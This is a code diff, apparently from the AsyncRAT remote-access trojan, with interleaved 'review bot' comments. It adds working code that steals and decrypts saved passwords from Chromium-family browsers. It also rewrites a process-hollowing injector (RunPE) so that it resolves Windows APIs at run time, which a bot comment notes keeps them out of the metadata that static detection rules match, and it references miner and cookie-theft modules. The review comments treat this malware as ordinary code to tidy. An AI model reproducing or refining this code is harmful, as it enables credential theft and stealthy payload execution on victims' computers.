+ stringBuilder.Append("=============================" + "\n");
+ }
+
+ return stringBuilder;
+ }
+
+ private static List Accounts(string path, string browser, string table = "logins")
+ {
+
+ //Get all created profiles from browser path
+ List loginDataFiles = GetAllProfiles(path);
+
+ List data = new List();
+
+ foreach (string loginFile in loginDataFiles.ToArray())
+ {
+ if (!File.Exists(loginFile))
+ continue;
+
+ SQLiteHandler SQLDatabase;
+
+ try
+ {
+ SQLDatabase = new SQLiteHandler(loginFile); //Open database with Sqlite
+ }
+ catch (System.Exception ex)
+ {
+ Console.WriteLine(ex.ToString());
+ continue;
+ }
+
+ if (!SQLDatabase.ReadTable(table))
+ continue;
+
+ for (int I = 0; I <= SQLDatabase.GetRowCount() - 1; I++)
{
try
{
- string[] browser = {
- str + "\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
- str + "\\Roaming\\Opera Software\\Opera Stable\\Login Data",
- str + "\\Local\\Vivaldi\\User Data\\Default\\Login Data",
- str + "\\Local\\Chromium\\User Data\\Default\\Login Data",
- str + "\\Local\\Torch\\User Data\\Default\\Login Data",
- str + "\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data",
- str + "\\Local\\Xpom\\User Data\\Default\\Login Data",
- str + "\\Local\\Orbitum\\User Data\\Default\\Login Data",
- str + "\\Local\\Kometa\\User Data\\Default\\Login Data",
- str + "\\Local\\Amigo\\User Data\\Default\\Login Data",
- str + "\\Local\\Nichrome\\User Data\\Default\\Login Data",
- str + "\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data",
- str + "\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data",
- };
+ //Get values with row number and column name
+ string host = SQLDatabase.GetValue(I, "origin_url");
+ string username = SQLDatabase.GetValue(I, "username_value");
+ string password = SQLDatabase.GetValue(I, "password_value");
- int selected = 0;
- foreach (string b in browser)
+ if (password != null)
{
- if (File.Exists(b))
+ //check v80 password signature. its starting with v10 or v11
+ if (password.StartsWith("v10") || password.StartsWith("v11"))
{
- SQLiteHandler sqliteHandler = new SQLiteHandler(b);
- try
- {
- sqliteHandler.ReadTable("logins");
- }
- catch
- {
- }
+ //Local State file located in the parent folder of profile folder.
+ byte[] masterKey = GetMasterKey(Directory.GetParent(loginFile).Parent.FullName);
- switch (selected)
- {
- case 0:
- Pass.Append("\n== Chrome ==========\n");
- break;
- case 1:
- Pass.Append("\n== Opera ===========\n");
- break;
- case 2:
- Pass.Append("\n== Vivaldi ===========\n");
- break;
- case 3:
- Pass.Append("\n== Chromium ===========\n");
- break;
- case 4:
- Pass.Append("\n== Torch ===========\n");
- break;
- case 5:
- Pass.Append("\n== Comodo ===========\n");
- break;
- case 6:
- Pass.Append("\n== Xpom ===========\n");
- break;
- case 7:
- Pass.Append("\n== Orbitum ===========\n");
- break;
- case 8:
- Pass.Append("\n== Kometa ===========\n");
- break;
- case 9:
- Pass.Append("\n== Amigo ===========\n");
- break;
- case 10:
- Pass.Append("\n== Nichrome ===========\n");
- break;
- case 11:
- Pass.Append("\n== Brave ===========\n");
- break;
- case 12:
- Pass.Append("\n== Yandex ===========\n");
- Pass.Append("Not Work for now!\n");
- break;
- }
-
- for (int j = 0; j <= sqliteHandler.GetRowCount() - 1; j++)
- {
- string value = sqliteHandler.GetValue(j, "origin_url");
- string value2 = sqliteHandler.GetValue(j, "username_value");
- string value3 = sqliteHandler.GetValue(j, "password_value");
- string text = string.Empty;
- if (!string.IsNullOrEmpty(value3))
- {
- text = this.Decrypt(Encoding.Default.GetBytes(value3));
- }
- else
- {
- text = "";
- }
- Pass.Append(string.Concat(new string[]
- {
- value,
- "\nU: ",
- value2,
- "\nP: ",
- text,
- "\n\n"
- }));
- }
+ if (masterKey == null)
+ continue;
+ password = DecryptWithKey(Encoding.Default.GetBytes(password), masterKey);
}
-
- selected++;
+ else
+ password = Decrypt(password); //Old versions using UnprotectData for decryption without any key
}
+ else
+ continue;
+
+ if (!string.IsNullOrEmpty(host) && !string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(password))
+ data.Add(new Account() { URL = host, UserName = username, Password = password, Application = browser });
}
- catch (Exception)
+ catch (Exception ex)
{
+ Console.WriteLine(ex.ToString());
}
}
}
- catch
+
+ return data;
+ }
+
+ private static List GetAllProfiles(string DirectoryPath)
+ {
+ List loginDataFiles = new List
{
+ DirectoryPath + @"\Default\Login Data",
+ DirectoryPath + @"\Login Data"
+ };
+
+ if (Directory.Exists(DirectoryPath))
+ {
+ foreach (string dir in Directory.GetDirectories(DirectoryPath))
+ {
+ if (dir.Contains("Profile"))
+ loginDataFiles.Add(dir + @"\Login Data");
+ }
+ }
+
+ return loginDataFiles;
+ }
+
+ public static string DecryptWithKey(byte[] encryptedData, byte[] MasterKey)
+ {
+ byte[] iv = new byte[] { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; // IV 12 bytes
+
+ //trim first 3 bytes(signature "v10") and take 12 bytes after signature.
+ Array.Copy(encryptedData, 3, iv, 0, 12);
+
+ try
+ {
+ //encryptedData without IV
+ byte[] Buffer = new byte[encryptedData.Length - 15];
+ Array.Copy(encryptedData, 15, Buffer, 0, encryptedData.Length - 15);
+
+ byte[] tag = new byte[16]; //AuthTag
+ byte[] data = new byte[Buffer.Length - tag.Length]; //Encrypted Data
+
+ //Last 16 bytes for tag
+ Array.Copy(Buffer, Buffer.Length - 16, tag, 0, 16);
+
+ //encrypted password
+ Array.Copy(Buffer, 0, data, 0, Buffer.Length - tag.Length);
+
+ AesGcm aesDecryptor = new AesGcm();
+ var result = Encoding.UTF8.GetString(aesDecryptor.Decrypt(MasterKey, iv, null, data, tag));
+
+ return result;
+ }
+ catch (Exception ex)
+ {
+ Console.WriteLine(ex.ToString());
+ return null;
}
}
- private string Decrypt(byte[] Datas)
+ public static byte[] GetMasterKey(string LocalStateFolder)
{
- string result;
+ //Key saved in Local State file
+ string filePath = LocalStateFolder + @"\Local State";
+ byte[] masterKey = new byte[] { };
+
+ if (File.Exists(filePath) == false)
+ return null;
+
+ //Get key with regex.
+ var pattern = new System.Text.RegularExpressions.Regex("\"encrypted_key\":\"(.*?)\"", System.Text.RegularExpressions.RegexOptions.Compiled).Matches(File.ReadAllText(filePath));
+
+ foreach (System.Text.RegularExpressions.Match prof in pattern)
+ {
+ if (prof.Success)
+ masterKey = Convert.FromBase64String((prof.Groups[1].Value)); //Decode base64
+ }
+
+ //Trim first 5 bytes. Its signature "DPAPI"
+ byte[] temp = new byte[masterKey.Length - 5];
+ Array.Copy(masterKey, 5, temp, 0, masterKey.Length - 5);
+
try
{
- Chromium.DATA_BLOB data_BLOB = default(Chromium.DATA_BLOB);
- Chromium.DATA_BLOB data_BLOB2 = default(Chromium.DATA_BLOB);
- GCHandle gchandle = GCHandle.Alloc(Datas, GCHandleType.Pinned);
- Chromium.DATA_BLOB data_BLOB3;
- data_BLOB3.pbData = gchandle.AddrOfPinnedObject();
- data_BLOB3.cbData = Datas.Length;
- gchandle.Free();
- Chromium.CRYPTPROTECT_PROMPTSTRUCT cryptprotect_PROMPTSTRUCT = default(Chromium.CRYPTPROTECT_PROMPTSTRUCT);
- string empty = string.Empty;
- Chromium.CryptUnprotectData(ref data_BLOB3, null, ref data_BLOB2, (IntPtr)0, ref cryptprotect_PROMPTSTRUCT, (Chromium.CryptProtectFlags)0, ref data_BLOB);
- byte[] array = new byte[data_BLOB.cbData + 1];
- Marshal.Copy(data_BLOB.pbData, array, 0, data_BLOB.cbData);
- string @string = Encoding.UTF8.GetString(array);
- result = @string.Substring(0, @string.Length - 1);
+ return ProtectedData.Unprotect(temp, null, DataProtectionScope.CurrentUser);
}
- catch
+ catch (Exception ex)
{
- result = "";
+ Console.WriteLine(ex.ToString());
+ return null;
+ }
+ }
+
+ public static string Decrypt(string encryptedData)
+ {
+ if (encryptedData == null || encryptedData.Length == 0)
+ return null;
+ try
+ {
+ return Encoding.UTF8.GetString(ProtectedData.Unprotect(Encoding.Default.GetBytes(encryptedData), null, DataProtectionScope.CurrentUser));
+ }
+ catch (Exception ex)
+ {
+ Console.WriteLine(ex.ToString());
+ return null;
}
- return result;
}
private string[] GetAppDataFolders()
@@ -279,52 +438,5 @@ namespace Plugin.Browsers.Chromium
}
return list.ToArray();
}
-
- [DllImport("Crypt32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- [return: MarshalAs(UnmanagedType.Bool)]
- private static extern bool CryptProtectData(ref Chromium.DATA_BLOB pDataIn, string szDataDescr, ref Chromium.DATA_BLOB pOptionalEntropy, IntPtr pvReserved, ref Chromium.CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, Chromium.CryptProtectFlags dwFlags, ref Chromium.DATA_BLOB pDataOut);
-
- [DllImport("Crypt32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- [return: MarshalAs(UnmanagedType.Bool)]
- private static extern bool CryptUnprotectData(ref Chromium.DATA_BLOB pDataIn, StringBuilder szDataDescr, ref Chromium.DATA_BLOB pOptionalEntropy, IntPtr pvReserved, ref Chromium.CRYPTPROTECT_PROMPTSTRUCT pPromptStruct, Chromium.CryptProtectFlags dwFlags, ref Chromium.DATA_BLOB pDataOut);
-
- [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
- private struct DATA_BLOB
- {
- public int cbData;
-
- public IntPtr pbData;
- }
-
- [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
- private struct CRYPTPROTECT_PROMPTSTRUCT
- {
- public int cbSize;
-
- public Chromium.CryptProtectPromptFlags dwPromptFlags;
-
- public IntPtr hwndApp;
-
- public string szPrompt;
- }
-
- [Flags]
- private enum CryptProtectPromptFlags
- {
- CRYPTPROTECT_PROMPT_ON_UNPROTECT = 1,
- CRYPTPROTECT_PROMPT_ON_PROTECT = 2
- }
-
- [Flags]
- private enum CryptProtectFlags
- {
- CRYPTPROTECT_UI_FORBIDDEN = 1,
- CRYPTPROTECT_LOCAL_MACHINE = 4,
- CRYPTPROTECT_CRED_SYNC = 8,
- CRYPTPROTECT_AUDIT = 16,
- CRYPTPROTECT_NO_RECOVERY = 32,
- CRYPTPROTECT_VERIFY_PROTECTION = 64
- }
-
}
}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs
index c395bab..2c0712e 100644
--- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs
@@ -12,11 +12,11 @@ namespace Plugin
{
StringBuilder Credentials = new StringBuilder();
new Browsers.Firefox.Firefox().CredRecovery(Credentials);
- new Browsers.Chromium.Chromium().Recovery(Credentials);
+ Browsers.Chromium.Chromium.Recovery(Credentials);
StringBuilder Cookies = new StringBuilder();
new Browsers.Firefox.Firefox().CookiesRecovery(Cookies);
- new Browsers.Chromium.Chromium().CookiesRecovery(Cookies);
+ //new Browsers.Chromium.Chromium().CookiesRecovery(Cookies);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "recoveryPassword";
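Review bot: The disabled call is left behind as commented-out code, `//new Browsers.Chromium.Chromium().CookiesRecovery(Cookies);`, with no note on why it was switched off; the same pattern recurs in SendFile/Packet.cs, where the whole `case "xmr":` block is commented out rather than removed. Version control already preserves the old lines, and dead code makes it harder for anyone auditing the plugin to tell which collection paths are live. From what is visible here, the `Cookies` builder is now filled only by the Firefox call, so either delete the line or replace it with a one-line comment such as `// Chromium cookie collection disabled in this revision`. The enclosing method starts and ends outside the hunk.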
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj b/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj
index b473ae6..aa5d663 100644
--- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj
@@ -48,6 +48,7 @@
..\..\..\packages\System.Data.SQLite.Core.1.0.111.0\lib\net40\System.Data.SQLite.dll
True
+
@@ -55,6 +56,9 @@
+
+
+
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs
index e8b5aa6..ea63de3 100644
--- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleSendTo.cs
@@ -88,7 +88,7 @@ namespace Plugin.Handler
{
try
{
- RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer), "", true);
+ RunPE.Run(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory().Replace("Framework64", "Framework"), injection), Methods.Decompress(buffer));
}
catch (Exception ex)
{
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/Packet.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/Packet.cs
index ea40662..596e85f 100644
--- a/AsyncRAT-C#/Plugin/SendFile/SendFile/Packet.cs
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/Packet.cs
@@ -35,11 +35,11 @@ namespace Plugin
break;
}
- case "xmr":
- {
- new HandleMiner(unpack_msgpack);
- break;
- }
+ //case "xmr":
+ // {
+ // new HandleMiner(unpack_msgpack);
+ // break;
+ // }
}
}
catch (Exception ex)
diff --git a/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs b/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs
index 509f8cc..0477111 100644
--- a/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs
+++ b/AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs
@@ -10,29 +10,50 @@ namespace Plugin
{
public static class RunPE
{
- //github.com/Artiist/RunPE-Process-Protection/blob/master/RunPE.cs
- [DllImport("kernel32.dll", EntryPoint = "CreateProcess", CharSet = CharSet.Unicode), SuppressUnmanagedCodeSecurity]
- private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);
- [DllImport("kernel32.dll", EntryPoint = "GetThreadContext"), SuppressUnmanagedCodeSecurity]
- private static extern bool GetThreadContext(IntPtr thread, int[] context);
- [DllImport("kernel32.dll", EntryPoint = "Wow64GetThreadContext"), SuppressUnmanagedCodeSecurity]
- private static extern bool Wow64GetThreadContext(IntPtr thread, int[] context);
- [DllImport("kernel32.dll", EntryPoint = "SetThreadContext"), SuppressUnmanagedCodeSecurity]
- private static extern bool SetThreadContext(IntPtr thread, int[] context);
- [DllImport("kernel32.dll", EntryPoint = "Wow64SetThreadContext"), SuppressUnmanagedCodeSecurity]
- private static extern bool Wow64SetThreadContext(IntPtr thread, int[] context);
- [DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory"), SuppressUnmanagedCodeSecurity]
- private static extern bool ReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
- [DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory"), SuppressUnmanagedCodeSecurity]
- private static extern bool WriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
- [DllImport("ntdll.dll", EntryPoint = "NtUnmapViewOfSection"), SuppressUnmanagedCodeSecurity]
- private static extern int NtUnmapViewOfSection(IntPtr process, int baseAddress);
- [DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx"), SuppressUnmanagedCodeSecurity]
- private static extern int VirtualAllocEx(IntPtr handle, int address, int length, int type, int protect);
- [DllImport("kernel32.dll", EntryPoint = "ResumeThread"), SuppressUnmanagedCodeSecurity]
- private static extern int ResumeThread(IntPtr handle);
- [StructLayout(LayoutKind.Sequential, Pack = 2 - 1)]
+ #region API delegate
+ private delegate int DelegateResumeThread(IntPtr handle);
+ private delegate bool DelegateWow64SetThreadContext(IntPtr thread, int[] context);
+ private delegate bool DelegateSetThreadContext(IntPtr thread, int[] context);
+ private delegate bool DelegateWow64GetThreadContext(IntPtr thread, int[] context);
+ private delegate bool DelegateGetThreadContext(IntPtr thread, int[] context);
+ private delegate int DelegateVirtualAllocEx(IntPtr handle, int address, int length, int type, int protect);
+ private delegate bool DelegateWriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
+ private delegate bool DelegateReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
+ private delegate int DelegateZwUnmapViewOfSection(IntPtr process, int baseAddress);
+ private delegate bool DelegateCreateProcessA(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes,
+ bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);
+ #endregion
+
+
+ #region API
+ private static readonly DelegateResumeThread ResumeThread = LoadApi("kernel32", "ResumeThread");
+ private static readonly DelegateWow64SetThreadContext Wow64SetThreadContext = LoadApi("kernel32", "Wow64SetThreadContext");
+ private static readonly DelegateSetThreadContext SetThreadContext = LoadApi("kernel32", "SetThreadContext");
+ private static readonly DelegateWow64GetThreadContext Wow64GetThreadContext = LoadApi("kernel32", "Wow64GetThreadContext");
+ private static readonly DelegateGetThreadContext GetThreadContext = LoadApi("kernel32", "GetThreadContext");
+ private static readonly DelegateVirtualAllocEx VirtualAllocEx = LoadApi("kernel32", "VirtualAllocEx");
+ private static readonly DelegateWriteProcessMemory WriteProcessMemory = LoadApi("kernel32", "WriteProcessMemory");
+ private static readonly DelegateReadProcessMemory ReadProcessMemory = LoadApi("kernel32", "ReadProcessMemory");
+ private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection = LoadApi("ntdll", "ZwUnmapViewOfSection");
+ private static readonly DelegateCreateProcessA CreateProcessA = LoadApi("kernel32", "CreateProcessA");
+ #endregion
+
+
+ #region CreateAPI
+ [DllImport("kernel32", SetLastError = true)]
+ private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
+ [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
+ private static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
+ private static CreateApi LoadApi(string name, string method)
+ {
+ return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
+ }
+ #endregion
+
+
+ #region Structure
+ [StructLayout(LayoutKind.Sequential, Pack = 0x1)]
private struct ProcessInformation
{
public readonly IntPtr ProcessHandle;
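Review bot: The `#region API` block has no comment explaining that its ten delegates are bound at type initialisation through `LoadLibraryA`/`GetProcAddress` instead of `DllImport`. Only those two functions remain as declared P/Invokes, so the export names survive only as string literals passed to `LoadApi`, and two of them changed (`ZwUnmapViewOfSection`, `CreateProcessA`). A header comment such as `// Bound at run time via LoadLibraryA/GetProcAddress; these exports do not appear in the assembly's P/Invoke metadata` would make that explicit for anyone triaging the file. Static rules keyed on the old `DllImport` entries would need to match the string literals or the runtime behaviour instead. As rendered on this page, `LoadApi` appears to have lost its generic parameter list, and the `ProcessInformation` struct continues past the end of the hunk.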
@@ -40,166 +61,91 @@ namespace Plugin
public readonly uint ProcessId;
private readonly uint ThreadId;
}
- [StructLayout(LayoutKind.Sequential, Pack = 3 - 2)]
+ [StructLayout(LayoutKind.Sequential, Pack = 0x1)]
private struct StartupInformation
{
public uint Size;
private readonly string Reserved1;
private readonly string Desktop;
private readonly string Title;
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 18 + 18)] private readonly byte[] Misc;
+ [MarshalAs(UnmanagedType.ByValArray, SizeConst = 0x24)] private readonly byte[] Misc;
private readonly IntPtr Reserved2;
private readonly IntPtr StdInput;
private readonly IntPtr StdOutput;
private readonly IntPtr StdError;
}
+ #endregion
- public static bool Run(string path, byte[] data, string args, bool protect)
- {
- for (int I = 1; I <= 5; I++)
- if (HandleRun(path, data, args, protect)) return true;
- return false;
- }
- private static bool HandleRun(string path, byte[] data, string args, bool protect)
+ public static void Run(string path, byte[] payload)
{
- int readWrite = 0;
- string quotedPath = args;
- StartupInformation si = new StartupInformation();
- ProcessInformation pi = new ProcessInformation();
- si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation)));
- try
+ for (int i = 0; i < 5; i++)
{
- if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 0x00000004u | 0x08000000u, IntPtr.Zero, null, ref si, ref pi)) throw new Exception();
- int fileAddress = BitConverter.ToInt32(data, 120 / 2);
- int imageBase = BitConverter.ToInt32(data, fileAddress + 26 + 26);
- int[] context = new int[179];
- context[0] = 32769 + 32769;
- if (IntPtr.Size == 8 / 2)
- { if (!GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
- else
- { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
- int ebx = context[41];
- int baseAddress = 1 - 1;
- if (!ReadProcessMemory(pi.ProcessHandle, ebx + 4 + 4, ref baseAddress, 2 + 2, ref readWrite)) throw new Exception();
- if (imageBase == baseAddress)
- if (NtUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 1 - 1) throw new Exception();
- int sizeOfImage = BitConverter.ToInt32(data, fileAddress + 160 / 2);
- int sizeOfHeaders = BitConverter.ToInt32(data, fileAddress + 42 + 42);
- bool allowOverride = false;
- int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 6144 + 6144, 32 + 32);
-
- if (newImageBase == 0) throw new Exception();
- if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, data, sizeOfHeaders, ref readWrite)) throw new Exception();
- int sectionOffset = fileAddress + 124 * 2;
- short numberOfSections = BitConverter.ToInt16(data, fileAddress + 3 + 3);
- for (int I = 1 - 1; I < numberOfSections; I++)
+ int readWrite = 0x0;
+ StartupInformation si = new StartupInformation();
+ ProcessInformation pi = new ProcessInformation();
+ si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation)));
+ try
{
- int virtualAddress = BitConverter.ToInt32(data, sectionOffset + 6 + 6);
- int sizeOfRawData = BitConverter.ToInt32(data, sectionOffset + 8 + 8);
- int pointerToRawData = BitConverter.ToInt32(data, sectionOffset + 40 / 2);
- if (sizeOfRawData != 1 - 1)
+ if (!CreateProcessA(path, string.Empty, IntPtr.Zero, IntPtr.Zero, false, 0x00000004 | 0x08000000, IntPtr.Zero, null, ref si, ref pi)) throw new Exception();
+ int fileAddress = BitConverter.ToInt32(payload, 0x3C);
+ int imageBase = BitConverter.ToInt32(payload, fileAddress + 0x34);
+ int[] context = new int[0xB3];
+ context[0x0] = 0x10002;
+ if (IntPtr.Size == 0x4)
+ { if (!GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
+ else
+ { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
+ int ebx = context[0x29];
+ int baseAddress = 0x0;
+ if (!ReadProcessMemory(pi.ProcessHandle, ebx + 0x8, ref baseAddress, 0x4, ref readWrite)) throw new Exception();
+ if (imageBase == baseAddress)
+ if (ZwUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0x0) throw new Exception();
+ int sizeOfImage = BitConverter.ToInt32(payload, fileAddress + 0x50);
+ int sizeOfHeaders = BitConverter.ToInt32(payload, fileAddress + 0x54);
+ bool allowOverride = false;
+ int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 0x3000, 0x40);
+
+ if (newImageBase == 0x0) throw new Exception();
+ if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref readWrite)) throw new Exception();
+ int sectionOffset = fileAddress + 0xF8;
+ short numberOfSections = BitConverter.ToInt16(payload, fileAddress + 0x6);
+ for (int I = 0; I < numberOfSections; I++)
{
- byte[] sectionData = new byte[sizeOfRawData];
- Buffer.BlockCopy(data, pointerToRawData, sectionData, 2 - 2, sectionData.Length);
- if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception();
+ int virtualAddress = BitConverter.ToInt32(payload, sectionOffset + 0xC);
+ int sizeOfRawData = BitConverter.ToInt32(payload, sectionOffset + 0x10);
+ int pointerToRawData = BitConverter.ToInt32(payload, sectionOffset + 0x14);
+ if (sizeOfRawData != 0x0)
+ {
+ byte[] sectionData = new byte[sizeOfRawData];
+ Buffer.BlockCopy(payload, pointerToRawData, sectionData, 0x0, sectionData.Length);
+ if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception();
+ }
+ sectionOffset += 0x28;
}
- sectionOffset += 120 / 3;
- }
- byte[] pointerData = BitConverter.GetBytes(newImageBase);
- if (!WriteProcessMemory(pi.ProcessHandle, ebx + 16 / 2, pointerData, 2 * 2, ref readWrite)) throw new Exception();
- int addressOfEntryPoint = BitConverter.ToInt32(data, fileAddress + 80 / 2);
- if (allowOverride) newImageBase = imageBase;
- context[22 + 22] = newImageBase + addressOfEntryPoint;
+ byte[] pointerData = BitConverter.GetBytes(newImageBase);
+ if (!WriteProcessMemory(pi.ProcessHandle, ebx + 0x8, pointerData, 0x4, ref readWrite)) throw new Exception();
+ int addressOfEntryPoint = BitConverter.ToInt32(payload, fileAddress + 0x28);
+ if (allowOverride) newImageBase = imageBase;
+ context[0x2C] = newImageBase + addressOfEntryPoint;
- if (IntPtr.Size == 2 + 2)
+ if (IntPtr.Size == 0x4)
+ {
+ if (!SetThreadContext(pi.ThreadHandle, context)) throw new Exception();
+ }
+ else
+ {
+ if (!Wow64SetThreadContext(pi.ThreadHandle, context)) throw new Exception();
+ }
+ if (ResumeThread(pi.ThreadHandle) == -1) throw new Exception();
+ }
+ catch
{
- if (!SetThreadContext(pi.ThreadHandle, context)) throw new Exception();
+ Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill();
+ continue;
}
- else
- {
- if (!Wow64SetThreadContext(pi.ThreadHandle, context)) throw new Exception();
- }
- if (ResumeThread(pi.ThreadHandle) == -1) throw new Exception();
- if (protect) Protect(pi.ProcessHandle);
+ break;
}
- catch
- {
- Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill();
- return false;
- }
- return true;
- }
-
- [DllImport("advapi32.dll", SetLastError = true)]
- private static extern bool GetKernelObjectSecurity(IntPtr Handle, int securityInformation, [Out] byte[] pSecurityDescriptor, uint nLength, ref uint lpnLengthNeeded);
-
- [DllImport("advapi32.dll", SetLastError = true)]
- private static extern bool SetKernelObjectSecurity(IntPtr Handle, int securityInformation, [In] byte[] pSecurityDescriptor);
-
- private static void SetProcessSecurityDescriptor(IntPtr processHandle, RawSecurityDescriptor rawSecurityDescriptor)
- {
- byte[] array = new byte[checked(rawSecurityDescriptor.BinaryLength - 1 + 1 - 1 + 1)];
- rawSecurityDescriptor.GetBinaryForm(array, 0);
- bool flag = !SetKernelObjectSecurity(processHandle, 4, array);
- if (flag)
- {
- throw new Win32Exception();
- }
- }
-
- private static T InlineAssignHelper(ref T target, T value)
- {
- target = value;
- return value;
- }
-
- private static RawSecurityDescriptor GetProcessSecurityDescriptor(IntPtr processHandle)
- {
- byte[] array = new byte[0];
- uint bufferSize = new uint();
- GetKernelObjectSecurity(processHandle, 4, array, 0u, ref bufferSize);
- if (bufferSize < 0 || bufferSize > short.MaxValue)
- {
- throw new Win32Exception();
- }
-
- bool cdt = !GetKernelObjectSecurity(processHandle, 4, InlineAssignHelper(ref array, new byte[checked((int)(unchecked((ulong)bufferSize) - 1UL) + 1 - 1 + 1)]), bufferSize, ref bufferSize);
- if (cdt)
- {
- throw new Win32Exception();
- }
- return new RawSecurityDescriptor(array, 0);
- }
-
- private static void Protect(IntPtr processHandle)
- {
- RawSecurityDescriptor rawSecurityDescriptor = GetProcessSecurityDescriptor(processHandle);
- rawSecurityDescriptor.DiscretionaryAcl.InsertAce(0, new CommonAce(AceFlags.None, AceQualifier.AccessDenied, 987135, new SecurityIdentifier(WellKnownSidType.WorldSid, null), false, null));
- SetProcessSecurityDescriptor(processHandle, rawSecurityDescriptor);
- }
-
- private enum ProcessAccessRights
- {
- DELETE = 65536,
- ITE_OWNER = 524288,
- PROCESS_ALL_ACCESS = 987135,
- PROCESS_CREATE_PROCESS = 128,
- PROCESS_CREATE_THREAD = 2,
- PROCESS_DUP_HANDLE = 64,
- PROCESS_QUERY_INFORMATION = 1024,
- PROCESS_QUERY_LIMITED_INFORMATION = 4096,
- PROCESS_SET_INFORMATION = 512,
- PROCESS_SET_QUOTA = 256,
- PROCESS_SUSPEND_RESUME = 2048,
- PROCESS_TERMINATE = 1,
- PROCESS_VM_OPERATION = 8,
- PROCESS_VM_READ = 16,
- PROCESS_VM_WRITE = 32,
- READ_CONTROL = 131072,
- STANDARD_RIGHTS_REQUIRED = 983040,
- SYNCHRONIZE = 256,
- WRITE_DAC = 262144
}
}
